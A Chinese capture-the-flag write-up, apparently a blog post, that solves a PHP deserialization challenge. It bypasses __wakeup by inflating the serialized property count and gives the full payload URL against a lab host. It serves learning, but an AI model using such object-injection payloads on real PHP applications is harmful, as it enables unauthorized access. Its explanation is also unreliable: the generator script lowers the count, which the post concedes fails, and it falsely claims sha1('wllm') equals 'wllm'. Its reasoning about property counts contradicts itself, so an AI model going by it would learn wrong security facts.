https://img-blog.csdnimg.cn/direct/f647f2bd06f649ee9e6b5c0b56d092ce.png" width="1200" />

打开题目后，点击三个？，发现是一个php序列化脚本

php"> <?phpheader("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");class HaHaHa{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __wakeup(){$this->passwd = sha1($this->passwd);}public function __destruct(){if($this->admin === "admin" && $this->passwd === "wllm"){include("flag.php");echo $flag;}else{echo $this->passwd;echo "No wake up";}}}$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);?> 

这个PHP脚本包含一个反序列化漏洞，可以通过精心构造的序列化字符串来利用。下面是对脚本的分析和如何绕过限制的解释：

1. class HaHaHa：定义了一个名为HaHaHa的类，该类有三个公共属性：admin、passwd，以及三个魔术方法：__construct、__wakeup和__destruct。

2. __construct：在对象创建时自动调用，设置admin为"user"，passwd为"123456"。

3. __wakeup：在对象反序列化时自动调用，将passwd通过sha1函数加密。

4. __destruct：在对象销毁时自动调用，检查admin是否为"admin"且passwd是否为"wllm"。如果是，则包含flag.php文件并输出$flag；否则，输出$passwd和"No wake up"。

5. $Letmeseesee = $_GET['p'];：从GET参数p中获取值，并尝试对其进行反序列化。

为了绕过这个限制并获取flag，你需要构造一个序列化字符串，使得反序列化后的对象满足admin为"admin"且passwd为"wllm"。由于__wakeup方法会改变passwd的值，我们需要利用PHP反序列化中的一个特性：如果序列化字符串中的属性数量与实际属性数量不匹配，__wakeup方法不会被调用。

这是解题所用到的php反序列化脚本：
 

php"><?phpclass HaHaHa {public $admin = "admin";public $passwd = "wllm";
}// 创建一个HaHaHa对象
$obj = new HaHaHa();// 序列化对象，并减少属性数量以绕过__wakeup
$serialized = serialize($obj);
$serialized = str_replace(':2:{', ':1:{', $serialized);// 输出序列化后的字符串
echo $serialized;?>

在这个脚本中，我们首先创建了一个HaHaHa对象，并设置了admin和passwd的值。然后，我们序列化这个对象，并修改序列化字符串，将属性数量从2改为1，这样在反序列化时__wakeup方法就不会被调用。最后，我们输出修改后的序列化字符串，这个字符串可以用于攻击目标脚本。

将这个脚本直接放到在线网站上运行，即可得到生成的序列化字符串

在线运行PHP这是一个简单方便的PHP在线运行工具，支持在线编译、在线调试和在线结果的实时反馈。https://csdnimg.cn/release/blog_editor_html/release2.3.6/ckeditor/plugins/CsdnLink/icons/icon-default.png?t=N7T8" alt="icon-default.png?t=N7T8" />https://www.bejson.com/runcode/php/https://img-blog.csdnimg.cn/direct/ee34643fd88f440080ef5eb2e0435659.png" width="1200" />

php">O:6:"HaHaHa":1:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

但生成的这个序列化字符串是不可以输出flag的，真正可以输出flag的序列化字符串是

php">O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

在原始的序列化字符串中，将属性数量从2减少到1，这是为了绕过__wakeup()方法，因为__wakeup()方法会尝试修改$passwd的值。但是，由于$passwd值已经是"wllm"，这个值的sha1()哈希值与原始值相同，因此即使__wakeup()方法被调用，也不会影响最终的检查条件。

为了正确绕过__wakeup()方法并满足__destruct()方法中的检查条件，需要确保序列化字符串中声明的属性数量与实际属性数量一致，但故意声明一个错误的数量。因此，正确的序列化字符串应该是O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}，其中声明了3个属性，但实际上只有2个。这样，PHP在反序列化时会将其调整为2个属性，但__wakeup()方法会被绕过，$passwd的值不会被修改，从而满足__destruct()方法中的检查条件，输出$flag

php">http://node4.anna.nssctf.cn:28225/class.php?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

访问即可得到flag。

https://img-blog.csdnimg.cn/direct/2d5c559b1ca947058c5252bc03051a39.png" width="1200" />

本题完。